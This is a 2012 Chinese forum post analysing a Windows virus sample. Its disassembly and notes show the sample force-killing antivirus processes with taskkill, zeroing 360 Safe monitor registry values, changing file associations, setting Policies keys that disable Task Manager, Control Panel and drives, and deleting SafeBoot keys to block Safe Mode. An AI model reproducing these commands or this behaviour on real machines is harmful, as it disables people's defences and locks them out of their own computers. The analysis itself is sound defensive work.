官方bilibiliWindows破解入门Android逆向入门
【网络诊断修复工具】切换到窄版

吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

吾爱破解 - 52pojie.cn»网站 【 病毒分析 】 『病毒分析区』 一个简单病毒分析
123下一页
返回列表 发新帖
查看: 16135|回复: 25
收起左侧

[PC样本分析] 一个简单病毒分析

[复制链接]
Thend
Thend 发表于 2012-9-17 19:57
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
基本信息:
报告名称:对一恶意程序的分析
作者:Thend
报告更新时间:2012.09.17
样本发现时间:未知
样本类型:恶性病毒
样本文件MD5校验:654C2392FFD3D4A6843CF86100940779
壳信息:无壳
语言:易语言
可能受到威胁的系统:windows
相关漏洞:无
简介:
  病毒一开始反复弹出一个恶搞弹窗。然后去找市面上大部分杀软的进程,并杀掉。然后进行一系列的注册表操作,禁用和隐藏了计算机大部分功能,使得计算机无法工作。
被感染系统的症状:
  隐藏:所有的文件和文件夹,开始菜单中的”运行“、“关机”、“注销”、“搜索”、“登陆”,磁盘驱动器,驱动器,文件夹选项,IE主页选项组,IE文件菜单,IE收藏夹栏,internet选项。
禁用:控制面板,任务管理器,驱动器,打印,IE查看源文件,IE下载功能,右键关联,重启切换到DOS环境,文档菜单,鼠标右键。
关闭所有杀软。所有应用程序图标更改。修改.txt、.inf、.reg、.exe文件的关联。
文件系统变化:
  在C:\Windows\system32目录下生成了:43.vbs、24.bat、59.bat、6.vbs。执行完之后删除。
注册表变化:
  见代码分析~
对本体的分析: 
<STRONG>0040C155 55 push ebp ;入口
0040C156 8BEC mov ebp,esp
0040C158 81EC 1C000000 sub esp,0x1C
0040C15E 68 04000080 push 0x80000004
0040C163 6A 00 push 0x0
0040C165 68 CB904000 push 样本.004090CB
0040C16A 68 01000000 push 0x1
0040C16F BB 60010000 mov ebx,0x160
0040C174 E8 AF230000 call 样本.0040E528 ; 弹出一个弹窗
0040C179 83C4 10 add esp,0x10
0040C17C 68 03000080 push 0x80000003
0040C181 52 push edx
0040C182 50 push eax
0040C183 68 01000000 push 0x1
0040C188 BB 14020000 mov ebx,0x214
0040C18D E8 96230000 call 样本.0040E528 ; 弹出一个弹窗
0040C192 83C4 10 add esp,0x10
0040C195 6A 00 push 0x0
0040C197 6A 00 push 0x0
0040C199 6A 00 push 0x0
0040C19B 68 01030080 push 0x80000301
0040C1A0 6A 00 push 0x0
0040C1A2 68 14000000 push 0x14
0040C1A7 68 04000080 push 0x80000004
0040C1AC 6A 00 push 0x0
0040C1AE 68 DA904000 push 样本.004090DA
0040C1B3 68 03000000 push 0x3
0040C1B8 BB 00030000 mov ebx,0x300
0040C1BD E8 66230000 call 样本.0040E528 ; 弹出一个弹窗
0040C1C2 83C4 28 add esp,0x28
0040C1C5 6A 00 push 0x0
0040C1C7 6A 00 push 0x0
0040C1C9 6A 00 push 0x0
0040C1CB 68 01030080 push 0x80000301
0040C1D0 6A 00 push 0x0
0040C1D2 68 14000000 push 0x14
0040C1D7 68 04000080 push 0x80000004
0040C1DC 6A 00 push 0x0
0040C1DE 68 DA904000 push 样本.004090DA
0040C1E3 68 03000000 push 0x3
0040C1E8 BB 00030000 mov ebx,0x300
0040C1ED E8 36230000 call 样本.0040E528 ; 弹出一个弹窗
0040C1F2 83C4 28 add esp,0x28
0040C1F5 6A 00 push 0x0
0040C1F7 6A 00 push 0x0
0040C1F9 6A 00 push 0x0
0040C1FB 68 01030080 push 0x80000301
0040C200 6A 00 push 0x0
0040C202 68 14000000 push 0x14
0040C207 68 04000080 push 0x80000004
0040C20C 6A 00 push 0x0
0040C20E 68 DA904000 push 样本.004090DA
0040C213 68 03000000 push 0x3
0040C218 BB 00030000 mov ebx,0x300
0040C21D E8 06230000 call 样本.0040E528 ; 弹出一个弹窗
0040C222 83C4 28 add esp,0x28
0040C225 6A 00 push 0x0
0040C227 6A 00 push 0x0
0040C229 6A 00 push 0x0
0040C22B 68 01030080 push 0x80000301
0040C230 6A 00 push 0x0
0040C232 68 14000000 push 0x14
0040C237 68 04000080 push 0x80000004
0040C23C 6A 00 push 0x0
0040C23E 68 DA904000 push 样本.004090DA
0040C243 68 03000000 push 0x3
0040C248 BB 00030000 mov ebx,0x300
0040C24D E8 D6220000 call 样本.0040E528 ; 弹出一个弹窗
0040C252 83C4 28 add esp,0x28
0040C255 68 01030080 push 0x80000301
0040C25A 6A 00 push 0x0
0040C25C 68 01000000 push 0x1
0040C261 68 02000080 push 0x80000002
0040C266 6A 00 push 0x0
0040C268 68 00000000 push 0x0
0040C26D 68 04000080 push 0x80000004
0040C272 6A 00 push 0x0
0040C274 68 F1904000 push 样本.004090F1 ; ASCII "taskkill /f /im kavsvc.exe"
0040C279 68 03000000 push 0x3
0040C27E BB C0020000 mov ebx,0x2C0
0040C283 E8 A0220000 call 样本.0040E528 ; 关闭卡巴
0040C288 83C4 28 add esp,0x28
0040C28B 68 01030080 push 0x80000301
0040C290 6A 00 push 0x0
0040C292 68 01000000 push 0x1
0040C297 68 02000080 push 0x80000002
0040C29C 6A 00 push 0x0
0040C29E 68 00000000 push 0x0
0040C2A3 68 04000080 push 0x80000004
0040C2A8 6A 00 push 0x0
0040C2AA 68 0C914000 push 样本.0040910C ; ASCII "taskkill /f /im KVXP.kxp"
0040C2AF 68 03000000 push 0x3
0040C2B4 BB C0020000 mov ebx,0x2C0
0040C2B9 E8 6A220000 call 样本.0040E528 ; 关闭江民
0040C2BE 83C4 28 add esp,0x28
0040C2C1 68 01030080 push 0x80000301
0040C2C6 6A 00 push 0x0
0040C2C8 68 01000000 push 0x1
0040C2CD 68 02000080 push 0x80000002
0040C2D2 6A 00 push 0x0
0040C2D4 68 00000000 push 0x0
0040C2D9 68 04000080 push 0x80000004
0040C2DE 6A 00 push 0x0
0040C2E0 68 25914000 push 样本.00409125 ; ASCII "taskkill /f /im Rav.exe"
0040C2E5 68 03000000 push 0x3
0040C2EA BB C0020000 mov ebx,0x2C0
0040C2EF E8 34220000 call 样本.0040E528 ; 关闭瑞星相关进程
0040C2F4 83C4 28 add esp,0x28
0040C2F7 68 01030080 push 0x80000301
0040C2FC 6A 00 push 0x0
0040C2FE 68 01000000 push 0x1
0040C303 68 02000080 push 0x80000002
0040C308 6A 00 push 0x0
0040C30A 68 00000000 push 0x0
0040C30F 68 04000080 push 0x80000004
0040C314 6A 00 push 0x0
0040C316 68 3D914000 push 样本.0040913D ; ASCII "taskkill /f /im Ravmon.exe"
0040C31B 68 03000000 push 0x3
0040C320 BB C0020000 mov ebx,0x2C0
0040C325 E8 FE210000 call 样本.0040E528 ; 关闭瑞星相关进程
0040C32A 83C4 28 add esp,0x28
0040C32D 68 01030080 push 0x80000301
0040C332 6A 00 push 0x0
0040C334 68 01000000 push 0x1
0040C339 68 02000080 push 0x80000002
0040C33E 6A 00 push 0x0
0040C340 68 00000000 push 0x0
0040C345 68 04000080 push 0x80000004
0040C34A 6A 00 push 0x0
0040C34C 68 58914000 push 样本.00409158 ; ASCII "taskkill /f /im Mcshield.exe"
0040C351 68 03000000 push 0x3
0040C356 BB C0020000 mov ebx,0x2C0
0040C35B E8 C8210000 call 样本.0040E528 ; 关闭McAfee VirusScan核心进程
0040C360 83C4 28 add esp,0x28
0040C363 68 01030080 push 0x80000301
0040C368 6A 00 push 0x0
0040C36A 68 01000000 push 0x1
0040C36F 68 02000080 push 0x80000002
0040C374 6A 00 push 0x0
0040C376 68 00000000 push 0x0
0040C37B 68 04000080 push 0x80000004
0040C380 6A 00 push 0x0
0040C382 68 75914000 push 样本.00409175 ; ASCII "taskkill /f /im VsTskMgr.exe"
0040C387 68 03000000 push 0x3
0040C38C BB C0020000 mov ebx,0x2C0
0040C391 E8 92210000 call 样本.0040E528 ; 关闭McAfee Internet Security网络安全套装的一部分
0040C396 83C4 28 add esp,0x28
0040C399 68 01030080 push 0x80000301
0040C39E 6A 00 push 0x0
0040C3A0 68 00000000 push 0x0
0040C3A5 68 04000080 push 0x80000004
0040C3AA 6A 00 push 0x0
0040C3AC 68 92914000 push 样本.00409192 ; ASCII "SOFTWARE\360Safe\safemon\ExecAccess"
0040C3B1 68 01030080 push 0x80000301
0040C3B6 6A 00 push 0x0
0040C3B8 68 04000000 push 0x4
0040C3BD 68 03000000 push 0x3
0040C3C2 BB A4060000 mov ebx,0x6A4
0040C3C7 E8 5C210000 call 样本.0040E528 ; 设置ExecAccess的键值为 0
0040C3CC 83C4 28 add esp,0x28
0040C3CF 68 01030080 push 0x80000301
0040C3D4 6A 00 push 0x0
0040C3D6 68 00000000 push 0x0
0040C3DB 68 04000080 push 0x80000004
0040C3E0 6A 00 push 0x0
0040C3E2 68 B6914000 push 样本.004091B6 ; ASCII "SOFTWARE\360Safe\safemon\MonAccess"
0040C3E7 68 01030080 push 0x80000301
0040C3EC 6A 00 push 0x0
0040C3EE 68 04000000 push 0x4
0040C3F3 68 03000000 push 0x3
0040C3F8 BB A4060000 mov ebx,0x6A4
0040C3FD E8 26210000 call 样本.0040E528 ; 设置MonAccess的键值为0
0040C402 83C4 28 add esp,0x28
0040C405 68 01030080 push 0x80000301
0040C40A 6A 00 push 0x0
0040C40C 68 00000000 push 0x0
0040C411 68 04000080 push 0x80000004
0040C416 6A 00 push 0x0
0040C418 68 D9914000 push 样本.004091D9 ; ASCII "SOFTWARE\360Safe\safemon\SiteAccess"
0040C41D 68 01030080 push 0x80000301
0040C422 6A 00 push 0x0
0040C424 68 04000000 push 0x4
0040C429 68 03000000 push 0x3
0040C42E BB A4060000 mov ebx,0x6A4
0040C433 E8 F0200000 call 样本.0040E528 ; 设置SiteAccess的键值为0
0040C438 83C4 28 add esp,0x28
0040C43B 68 01030080 push 0x80000301
0040C440 6A 00 push 0x0
0040C442 68 00000000 push 0x0
0040C447 68 04000080 push 0x80000004
0040C44C 6A 00 push 0x0
0040C44E 68 FD914000 push 样本.004091FD ; ASCII "SOFTWARE\360Safe\safemon\UDiskAccess"
0040C453 68 01030080 push 0x80000301
0040C458 6A 00 push 0x0
0040C45A 68 04000000 push 0x4
0040C45F 68 03000000 push 0x3
0040C464 BB A4060000 mov ebx,0x6A4
0040C469 E8 BA200000 call 样本.0040E528 ; 设置UDiskAccess的键值为0
0040C46E 83C4 28 add esp,0x28
0040C471 68 01030080 push 0x80000301
0040C476 6A 00 push 0x0
0040C478 68 01000000 push 0x1
0040C47D 68 02000080 push 0x80000002
0040C482 6A 00 push 0x0
0040C484 68 00000000 push 0x0
0040C489 68 04000080 push 0x80000004
0040C48E 6A 00 push 0x0
0040C490 68 22924000 push 样本.00409222 ; ASCII "taskkill /f /im 360tray.exe"
0040C495 68 03000000 push 0x3
0040C49A BB C0020000 mov ebx,0x2C0
0040C49F E8 84200000 call 样本.0040E528 ; 杀掉360实时监控进程
0040C4A4 83C4 28 add esp,0x28
0040C4A7 68 04000080 push 0x80000004
0040C4AC 6A 00 push 0x0
0040C4AE 68 3E924000 push 样本.0040923E ; ASCII "jpegfile"
0040C4B3 68 04000080 push 0x80000004
0040C4B8 6A 00 push 0x0
0040C4BA 68 47924000 push 样本.00409247 ; ASCII ".txt"
0040C4BF 68 01030080 push 0x80000301
0040C4C4 6A 00 push 0x0
0040C4C6 68 01000000 push 0x1
0040C4CB 68 03000000 push 0x3
0040C4D0 BB A4060000 mov ebx,0x6A4
0040C4D5 E8 4E200000 call 样本.0040E528 ; 修改.txt文件关联
0040C4DA 83C4 28 add esp,0x28
0040C4DD 68 04000080 push 0x80000004
0040C4E2 6A 00 push 0x0
0040C4E4 68 3E924000 push 样本.0040923E ; ASCII "jpegfile"
0040C4E9 68 04000080 push 0x80000004
0040C4EE 6A 00 push 0x0
0040C4F0 68 4D924000 push 样本.0040924D ; ASCII ".inf"
0040C4F5 68 01030080 push 0x80000301
0040C4FA 6A 00 push 0x0
0040C4FC 68 01000000 push 0x1
0040C501 68 03000000 push 0x3
0040C506 BB A4060000 mov ebx,0x6A4
0040C50B E8 18200000 call 样本.0040E528 ; 修改.inf文件关联
0040C510 83C4 28 add esp,0x28
0040C513 68 01030080 push 0x80000301
0040C518 6A 00 push 0x0
0040C51A 68 00000000 push 0x0
0040C51F 68 04000080 push 0x80000004
0040C524 6A 00 push 0x0
0040C526 68 53924000 push 样本.00409253 ; ASCII "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
0040C52B 68 01030080 push 0x80000301
0040C530 6A 00 push 0x0
0040C532 68 04000000 push 0x4
0040C537 68 03000000 push 0x3
0040C53C BB A4060000 mov ebx,0x6A4
0040C541 E8 E21F0000 call 样本.0040E528 ; 将CheckedValue的键值设置成0. 使系统无法显示隐藏文件
0040C546 83C4 28 add esp,0x28
0040C549 68 01030080 push 0x80000301
0040C54E 6A 00 push 0x0
0040C550 68 00000000 push 0x0
0040C555 68 04000080 push 0x80000004
0040C55A 6A 00 push 0x0
0040C55C 68 B2924000 push 样本.004092B2 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
0040C561 68 01030080 push 0x80000301
0040C566 6A 00 push 0x0
0040C568 68 03000000 push 0x3
0040C56D 68 03000000 push 0x3
0040C572 BB A4060000 mov ebx,0x6A4
0040C577 E8 AC1F0000 call 样本.0040E528 ; 禁用任务管理器
0040C57C 83C4 28 add esp,0x28
0040C57F 68 01030080 push 0x80000301
0040C584 6A 00 push 0x0
0040C586 68 01000000 push 0x1
0040C58B 68 04000080 push 0x80000004
0040C590 6A 00 push 0x0
0040C592 68 FB924000 push 样本.004092FB ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel"
0040C597 68 01030080 push 0x80000301
0040C59C 6A 00 push 0x0
0040C59E 68 03000000 push 0x3
0040C5A3 68 03000000 push 0x3
0040C5A8 BB A4060000 mov ebx,0x6A4
0040C5AD E8 761F0000 call 样本.0040E528 ; 禁用控制面板
0040C5B2 83C4 28 add esp,0x28
0040C5B5 68 01030080 push 0x80000301
0040C5BA 6A 00 push 0x0
0040C5BC 68 01000000 push 0x1
0040C5C1 68 04000080 push 0x80000004
0040C5C6 6A 00 push 0x0
0040C5C8 68 46934000 push 样本.00409346 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools"
0040C5CD 68 01030080 push 0x80000301
0040C5D2 6A 00 push 0x0
0040C5D4 68 03000000 push 0x3
0040C5D9 68 03000000 push 0x3
0040C5DE BB A4060000 mov ebx,0x6A4
0040C5E3 E8 401F0000 call 样本.0040E528 ; 隐藏开始菜单中的运行,禁止通过任务管理器创建新任务
0040C5E8 83C4 28 add esp,0x28
0040C5EB 68 01030080 push 0x80000301
0040C5F0 6A 00 push 0x0
0040C5F2 68 01000000 push 0x1
0040C5F7 68 04000080 push 0x80000004
0040C5FC 6A 00 push 0x0
0040C5FE 68 95934000 push 样本.00409395 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun"
0040C603 68 01030080 push 0x80000301
0040C608 6A 00 push 0x0
0040C60A 68 03000000 push 0x3
0040C60F 68 03000000 push 0x3
0040C614 BB A4060000 mov ebx,0x6A4
0040C619 E8 0A1F0000 call 样本.0040E528 ; 隐藏“MS-DOS”下的磁盘驱动器。
0040C61E 83C4 28 add esp,0x28
0040C621 68 01030080 push 0x80000301
0040C626 6A 00 push 0x0
0040C628 68 01000000 push 0x1
0040C62D 68 04000080 push 0x80000004
0040C632 6A 00 push 0x0
0040C634 68 D7934000 push 样本.004093D7 ; ASCII "SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled"
0040C639 68 01030080 push 0x80000301
0040C63E 6A 00 push 0x0
0040C640 68 03000000 push 0x3
0040C645 68 03000000 push 0x3
0040C64A BB A4060000 mov ebx,0x6A4
0040C64F E8 D41E0000 call 样本.0040E528 ; 隐藏开始中的关机
0040C654 83C4 28 add esp,0x28
0040C657 68 01060080 push 0x80000601
0040C65C 68 FFFFEF41 push 0x41EFFFFF
0040C661 68 0000E0FF push 0xFFE00000
0040C666 68 04000080 push 0x80000004
0040C66B 6A 00 push 0x0
0040C66D 68 21944000 push 样本.00409421 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives"
0040C672 68 01030080 push 0x80000301
0040C677 6A 00 push 0x0
0040C679 68 03000000 push 0x3
0040C67E 68 03000000 push 0x3
0040C683 BB A4060000 mov ebx,0x6A4
0040C688 E8 9B1E0000 call 样本.0040E528 ; 隐藏所有驱动器
0040C68D 83C4 28 add esp,0x28
0040C690 68 01060080 push 0x80000601
0040C695 68 FFFFEF41 push 0x41EFFFFF
0040C69A 68 0000E0FF push 0xFFE00000
0040C69F 68 04000080 push 0x80000004
0040C6A4 6A 00 push 0x0
0040C6A6 68 66944000 push 样本.00409466 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive"
0040C6AB 68 01030080 push 0x80000301
0040C6B0 6A 00 push 0x0
0040C6B2 68 03000000 push 0x3
0040C6B7 68 03000000 push 0x3
0040C6BC BB A4060000 mov ebx,0x6A4
0040C6C1 E8 621E0000 call 样本.0040E528 ; 禁止所有驱动器
0040C6C6 83C4 28 add esp,0x28
0040C6C9 68 01030080 push 0x80000301
0040C6CE 6A 00 push 0x0
0040C6D0 68 01000000 push 0x1
0040C6D5 68 04000080 push 0x80000004
0040C6DA 6A 00 push 0x0
0040C6DC 68 B0944000 push 样本.004094B0 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions"
0040C6E1 68 01030080 push 0x80000301
0040C6E6 6A 00 push 0x0
0040C6E8 68 03000000 push 0x3
0040C6ED 68 03000000 push 0x3
0040C6F2 BB A4060000 mov ebx,0x6A4
0040C6F7 E8 2C1E0000 call 样本.0040E528 ; 隐藏文件夹选项
0040C6FC 83C4 28 add esp,0x28
0040C6FF 68 01030080 push 0x80000301
0040C704 6A 00 push 0x0
0040C706 68 01000000 push 0x1
0040C70B 68 04000080 push 0x80000004
0040C710 6A 00 push 0x0
0040C712 68 FC944000 push 样本.004094FC ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop"
0040C717 68 01030080 push 0x80000301
0040C71C 6A 00 push 0x0
0040C71E 68 03000000 push 0x3
0040C723 68 03000000 push 0x3
0040C728 BB A4060000 mov ebx,0x6A4
0040C72D E8 F61D0000 call 样本.0040E528 ; 隐藏桌面对象
0040C732 83C4 28 add esp,0x28
0040C735 68 01030080 push 0x80000301
0040C73A 6A 00 push 0x0
0040C73C 68 01000000 push 0x1
0040C741 68 04000080 push 0x80000004
0040C746 6A 00 push 0x0
0040C748 68 42954000 push 样本.00409542 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose"
0040C74D 68 01030080 push 0x80000301
0040C752 6A 00 push 0x0
0040C754 68 03000000 push 0x3
0040C759 68 03000000 push 0x3
0040C75E BB A4060000 mov ebx,0x6A4
0040C763 E8 C01D0000 call 样本.0040E528 ; 隐藏开始中的关机
0040C768 83C4 28 add esp,0x28
0040C76B 68 01030080 push 0x80000301
0040C770 6A 00 push 0x0
0040C772 68 01000000 push 0x1
0040C777 68 04000080 push 0x80000004
0040C77C 6A 00 push 0x0
0040C77E 68 86954000 push 样本.00409586 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind"
0040C783 68 01030080 push 0x80000301
0040C788 6A 00 push 0x0
0040C78A 68 03000000 push 0x3
0040C78F 68 03000000 push 0x3
0040C794 BB A4060000 mov ebx,0x6A4
0040C799 E8 8A1D0000 call 样本.0040E528 ; 隐藏开始中的搜索
0040C79E 83C4 28 add esp,0x28
0040C7A1 68 01030080 push 0x80000301
0040C7A6 6A 00 push 0x0
0040C7A8 68 01000000 push 0x1
0040C7AD 68 04000080 push 0x80000004
0040C7B2 6A 00 push 0x0
0040C7B4 68 C9954000 push 样本.004095C9 ; ASCII "Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage"
0040C7B9 68 01030080 push 0x80000301
0040C7BE 6A 00 push 0x0
0040C7C0 68 03000000 push 0x3
0040C7C5 68 03000000 push 0x3
0040C7CA BB A4060000 mov ebx,0x6A4
0040C7CF E8 541D0000 call 样本.0040E528 ; 隐藏IE主页选项
0040C7D4 83C4 28 add esp,0x28
0040C7D7 68 01030080 push 0x80000301
0040C7DC 6A 00 push 0x0
0040C7DE 68 01000000 push 0x1
0040C7E3 68 04000080 push 0x80000004
0040C7E8 6A 00 push 0x0
0040C7EA 68 0E964000 push 样本.0040960E ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu"
0040C7EF 68 01030080 push 0x80000301
0040C7F4 6A 00 push 0x0
0040C7F6 68 03000000 push 0x3
0040C7FB 68 03000000 push 0x3
0040C800 BB A4060000 mov ebx,0x6A4
0040C805 E8 1E1D0000 call 样本.0040E528 ; 隐藏IE文件菜单
0040C80A 83C4 28 add esp,0x28
0040C80D 68 01030080 push 0x80000301
0040C812 6A 00 push 0x0
0040C814 68 01000000 push 0x1
0040C819 68 04000080 push 0x80000004
0040C81E 6A 00 push 0x0
0040C820 68 55964000 push 样本.00409655 ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites"
0040C825 68 01030080 push 0x80000301
0040C82A 6A 00 push 0x0
0040C82C 68 03000000 push 0x3
0040C831 68 03000000 push 0x3
0040C836 BB A4060000 mov ebx,0x6A4
0040C83B E8 E81C0000 call 样本.0040E528 ; 隐藏IE收藏文件夹
0040C840 83C4 28 add esp,0x28
0040C843 68 01030080 push 0x80000301
0040C848 6A 00 push 0x0
0040C84A 68 01000000 push 0x1
0040C84F 68 04000080 push 0x80000004
0040C854 6A 00 push 0x0
0040C856 68 9C964000 push 样本.0040969C ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting"
0040C85B 68 01030080 push 0x80000301
0040C860 6A 00 push 0x0
0040C862 68 03000000 push 0x3
0040C867 68 03000000 push 0x3
0040C86C BB A4060000 mov ebx,0x6A4
0040C871 E8 B21C0000 call 样本.0040E528 ; 禁止IE打印功能
0040C876 83C4 28 add esp,0x28
0040C879 68 01030080 push 0x80000301
0040C87E 6A 00 push 0x0
0040C880 68 01000000 push 0x1
0040C885 68 04000080 push 0x80000004
0040C88A 6A 00 push 0x0
0040C88C 68 E2964000 push 样本.004096E2 ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions"
0040C891 68 01030080 push 0x80000301
0040C896 6A 00 push 0x0
0040C898 68 03000000 push 0x3
0040C89D 68 03000000 push 0x3
0040C8A2 BB A4060000 mov ebx,0x6A4
0040C8A7 E8 7C1C0000 call 样本.0040E528 ; 禁止右键关联菜单
0040C8AC 83C4 28 add esp,0x28
0040C8AF 68 01030080 push 0x80000301
0040C8B4 6A 00 push 0x0
0040C8B6 68 01000000 push 0x1
0040C8BB 68 04000080 push 0x80000004
0040C8C0 6A 00 push 0x0
0040C8C2 68 2E974000 push 样本.0040972E ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource"
0040C8C7 68 01030080 push 0x80000301
0040C8CC 6A 00 push 0x0
0040C8CE 68 03000000 push 0x3
0040C8D3 68 03000000 push 0x3
0040C8D8 BB A4060000 mov ebx,0x6A4
0040C8DD E8 461C0000 call 样本.0040E528 ; 禁止IE查看源文件
0040C8E2 83C4 28 add esp,0x28
0040C8E5 68 01030080 push 0x80000301
0040C8EA 6A 00 push 0x0
0040C8EC 68 03000000 push 0x3
0040C8F1 68 04000080 push 0x80000004
0040C8F6 6A 00 push 0x0
0040C8F8 68 76974000 push 样本.00409776 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803"
0040C8FD 68 01030080 push 0x80000301
0040C902 6A 00 push 0x0
0040C904 68 03000000 push 0x3
0040C909 68 03000000 push 0x3
0040C90E BB A4060000 mov ebx,0x6A4
0040C913 E8 101C0000 call 样本.0040E528 ; 禁止IE下载功能
0040C918 83C4 28 add esp,0x28
0040C91B 68 01030080 push 0x80000301
0040C920 6A 00 push 0x0
0040C922 68 01000000 push 0x1
0040C927 68 04000080 push 0x80000004
0040C92C 6A 00 push 0x0
0040C92E 68 BF974000 push 样本.004097BF ; ASCII "Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu"
0040C933 68 01030080 push 0x80000301
0040C938 6A 00 push 0x0
0040C93A 68 03000000 push 0x3
0040C93F 68 03000000 push 0x3
0040C944 BB A4060000 mov ebx,0x6A4
0040C949 E8 DA1B0000 call 样本.0040E528 ; 禁止右键关联
0040C94E 83C4 28 add esp,0x28
0040C951 68 01030080 push 0x80000301
0040C956 6A 00 push 0x0
0040C958 68 01000000 push 0x1
0040C95D 68 04000080 push 0x80000004
0040C962 6A 00 push 0x0
0040C964 68 0F984000 push 样本.0040980F ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode"
0040C969 68 01030080 push 0x80000301
0040C96E 6A 00 push 0x0
0040C970 68 03000000 push 0x3
0040C975 68 03000000 push 0x3
0040C97A BB A4060000 mov ebx,0x6A4
0040C97F E8 A41B0000 call 样本.0040E528 ; 禁止重新启动计算机到MS-DOS环境
0040C984 83C4 28 add esp,0x28
0040C987 68 01030080 push 0x80000301
0040C98C 6A 00 push 0x0
0040C98E 68 01000000 push 0x1
0040C993 68 04000080 push 0x80000004
0040C998 6A 00 push 0x0
0040C99A 68 56984000 push 样本.00409856 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff"
0040C99F 68 01030080 push 0x80000301
0040C9A4 6A 00 push 0x0
0040C9A6 68 03000000 push 0x3
0040C9AB 68 03000000 push 0x3
0040C9B0 BB A4060000 mov ebx,0x6A4
0040C9B5 E8 6E1B0000 call 样本.0040E528 ; 隐藏开始菜单中的登录项
0040C9BA 83C4 28 add esp,0x28
0040C9BD 68 01030080 push 0x80000301
0040C9C2 6A 00 push 0x0
0040C9C4 68 01000000 push 0x1
0040C9C9 68 04000080 push 0x80000004
0040C9CE 6A 00 push 0x0
0040C9D0 68 9B984000 push 样本.0040989B ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu"
0040C9D5 68 01030080 push 0x80000301
0040C9DA 6A 00 push 0x0
0040C9DC 68 03000000 push 0x3
0040C9E1 68 03000000 push 0x3
0040C9E6 BB A4060000 mov ebx,0x6A4
0040C9EB E8 381B0000 call 样本.0040E528 ; 隐藏开始菜单中的文档菜单
0040C9F0 83C4 28 add esp,0x28
0040C9F3 68 01030080 push 0x80000301
0040C9F8 6A 00 push 0x0
0040C9FA 68 01000000 push 0x1
0040C9FF 68 04000080 push 0x80000004
0040CA04 6A 00 push 0x0
0040CA06 68 56984000 push 样本.00409856 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff"
0040CA0B 68 01030080 push 0x80000301
0040CA10 6A 00 push 0x0
0040CA12 68 03000000 push 0x3
0040CA17 68 03000000 push 0x3
0040CA1C BB A4060000 mov ebx,0x6A4
0040CA21 E8 021B0000 call 样本.0040E528 ; 隐藏开始菜单中的登录项
0040CA26 83C4 28 add esp,0x28
0040CA29 68 01030080 push 0x80000301
0040CA2E 6A 00 push 0x0
0040CA30 68 01000000 push 0x1
0040CA35 68 04000080 push 0x80000004
0040CA3A 6A 00 push 0x0
0040CA3C 68 E8984000 push 样本.004098E8 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu"
0040CA41 68 01030080 push 0x80000301
0040CA46 6A 00 push 0x0
0040CA48 68 03000000 push 0x3
0040CA4D 68 03000000 push 0x3
0040CA52 BB A4060000 mov ebx,0x6A4
0040CA57 E8 CC1A0000 call 样本.0040E528 ; 禁止使用鼠标右键
0040CA5C 83C4 28 add esp,0x28
0040CA5F 68 01030080 push 0x80000301
0040CA64 6A 00 push 0x0
0040CA66 68 01000000 push 0x1
0040CA6B 68 04000080 push 0x80000004
0040CA70 6A 00 push 0x0
0040CA72 68 36994000 push 样本.00409936 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders"
0040CA77 68 01030080 push 0x80000301
0040CA7C 6A 00 push 0x0
0040CA7E 68 03000000 push 0x3
0040CA83 68 03000000 push 0x3
0040CA88 BB A4060000 mov ebx,0x6A4
0040CA8D E8 961A0000 call 样本.0040E528 ; 禁止修改控制面板</STRONG>
下面就是删除一些注册表项。来阻止我们进入安全模式:

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\”)
